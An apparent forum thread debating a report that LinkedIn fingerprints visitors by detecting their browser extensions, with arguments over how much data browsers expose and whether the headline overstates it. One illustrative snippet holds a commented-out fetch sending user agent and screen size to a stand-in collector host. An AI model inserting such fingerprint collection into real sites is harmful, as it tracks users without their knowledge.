Microsoft is running one of the largest corporate espionage operations in modern history. Every time any of LinkedIn’s one billion users visits linkedin.com, hidden code searches their computer for installed software, collects the results, and transmits them to LinkedIn’s servers and to third-party companies including an American-Israeli cybersecurity firm.


First comment from the link:
That is very different from “searches their computer for installed software”
Still don’t really understand why browsers expose this data to sites.
Web browsers are just such a massive security hole.
On the contrary, websites are incredibly sandboxed. It’s damn near impossible to find out anything about the computer. Off the top of my head: Want to know where the file lives that the user just picked? Sure, it’s C:\fakepath\filename. Wanna check the color of a link to see if the user has visited the site before? No need to check. The answer will be ‘false’. Always.
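The file-path example above can be sketched as a pure function. This is a hypothetical illustration of the masking rule browsers apply (per the HTML spec, a file input's `value` reports `C:\fakepath\` plus the bare filename, never the real directory); the function name is made up for this sketch.

```javascript
// Sketch of how browsers mask file paths: no matter where the file
// actually lives, scripts only ever see "C:\fakepath\<filename>".
function fakepathValue(realPath) {
  // Take just the final path component, whether the separators
  // are Windows-style backslashes or Unix-style slashes.
  const filename = realPath.split(/[\\/]/).pop();
  return 'C:\\fakepath\\' + filename;
}

// In a real page, document.getElementById('f').value returns exactly this.
```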
Here’s the information a web server needs to deliver content to a browser:
Everything else is a fucking security hole. There’s no good reason for servers to know what extensions you have installed, what OS you’re running, the dimensions of your browser window, where your mouse cursor is positioned, or any one of a thousand other data points that browsers freely hand over.
The browser can never know what information is needed for a certain use case. So it needs to be permissive in order to not break valid uses.
For instance, your list does not include the things a user clicks on the website. But that’s exactly the info I needed to log recently. A user was complaining that dropdowns would close automatically. We quickly arrived at the hypothesis that something was sending two click events. To prove that, I started logging the user’s clicks. If there were two in the same millisecond, then it’s definitely not a bug but a hardware (or driver or OS or whatever) issue.
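The debugging approach described above can be sketched in a few lines. This is a hypothetical reconstruction, not the commenter's actual code: collect click timestamps, then flag any two that land in the same millisecond, which points at hardware/driver echo rather than an application bug.

```javascript
// Given a list of click timestamps (ms), return the ones that occur
// more than once -- i.e. suspected duplicate hardware click events.
function findDuplicateClicks(timestampsMs) {
  const seen = new Set();
  const duplicates = [];
  for (const t of timestampsMs) {
    if (seen.has(t)) duplicates.push(t);
    seen.add(t);
  }
  return duplicates;
}

// In a real page the timestamps would come from something like:
// document.addEventListener('click', e => log.push(Math.round(e.timeStamp)));
```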
Bug fixing is not a reason to enable massive privacy violations.
There are absolutely reasons. Firefox does a reasonable job of anti-fingerprinting, and it’s a fine line to walk to disable as many of those indicators as possible without breaking sites.
Browsers do give away too much, but at least Firefox is working on it. And it’s not extremely straightforward.
If the site doesn’t know the window width, it can’t react to mobile or desktop users automatically, scale elements, or switch to what’s best for your display.
You need mouse input for hovering effects as well
False. Browsers can announce themselves as desktop or mobile, or even advertise pre-determined fake window and screen sizes for this purpose (in Firefox it’s called “letterboxing” in the hidden settings). There is no need for a server to have any of this information anyway - either the design of the webpage should be responsive by default, or the server can send whichever style files the browser specifically asks for, perhaps falling back to an “all.css” or something.
That can all be done 100% client side. The server does not need this information.
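A minimal sketch of that claim, with hypothetical breakpoints: the layout decision is a pure function of the width, so it can run entirely in the page and the width never has to be reported to a server.

```javascript
// Client-side layout selection: the server never learns the width.
// Breakpoint values here are made up for illustration.
function pickLayout(widthPx) {
  if (widthPx < 600) return 'mobile';
  if (widthPx < 1024) return 'tablet';
  return 'desktop';
}

// In a real page: document.body.className = pickLayout(window.innerWidth);
// (or, even simpler, pure CSS @media queries with no script at all)
```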
If you can do it client side, you can send it to a server…
The difference is intent.
Yes, because web browsers, under current web architecture, allow this.
This is entirely my point.
How would they prevent it? If they allow your app to read a value client side, it can do whatever it wants with it, including sending it.
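The point above can be made concrete with a hedged sketch: once a script can read a value, one extra line ships it off. The `navigator`/`screen` objects are stubbed as plain parameters here so the logic is visible outside a browser, and the collector URL is invented.

```javascript
// Anything readable client-side can be serialized and sent anywhere.
function buildPayload(nav, scr) {
  return JSON.stringify({ ua: nav.userAgent, w: scr.width, h: scr.height });
}

// In a real page, exfiltration is a single call (URL is hypothetical):
// fetch('https://collector.example/ingest', {
//   method: 'POST',
//   body: buildPayload(navigator, screen),
// });
```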
If your app needs to present different behavior based on user settings, it needs to read it.
They allow this because they are being developed to allow this.
Browsers that don’t allow this, for a Web-like system without such functionality (like Gemini), can be written in two days, or a week if you don’t hurry.
Or at least take as long as Mosaic or Arena took to become usable.
Enormous resources are being invested into continued development of a platform where users provide valuable feedback.
By the way, ML is long past the point where that data could even be interpreted ambiguously. Those who have the data know exactly who you are and probably some useful traits of what you are thinking the moment you are typing a comment at any big website.
They will always allow it as long as you have JavaScript or any other client-side code.
Ah, I read it as the browser doesn’t need that data. I’d say it needs width (maybe height), but that’s it.
But the info talked about in the OP is collected via the client sending the data to a server, not the server getting it all the time.
Well, I guess it’s technically installed software… but the scope is significantly less than what’s implied from the headline. My immediate reaction was, “how?”
This is basically standard browser fingerprinting, hence why it’s sold for surveillance activities. LinkedIn is Big Brother.
DuckDuckGo my friends
DuckDuckGo is still a Chromium browser. Firefox, buddies, Firefox.
WTF is this article? Browser extensions are standard browser fingerprinting data.
Gonna have to agree here. Article headline is rage bait
That sounds… normal? And maybe even sensible, especially if LinkedIn does SSR, since that could allow the servers to know how to tailor the content to the specific browser requesting a page.
In what fucking world is it “normal” or “sensible” to scan your browser extensions to decide how to render a page? Please explain.
I’ve been doing web development for 30 years (since the time when “SSR” was just called “building a web app”) and I have not once ever had the desire or need to do this.
The reason is fingerprinting. Verrrry old technique. Adtech stuff. You might collect browser extensions, WebGL information, CPU core count, screen resolution, IP address, reverse DNS, locale, headers, user agent, Akamai hash, etc. The point is that these metrics can then be enriched to build a consumer profile and used in analytics.
I can only think of reasons that are meant to block you based on what you are using to augment your browsing experience.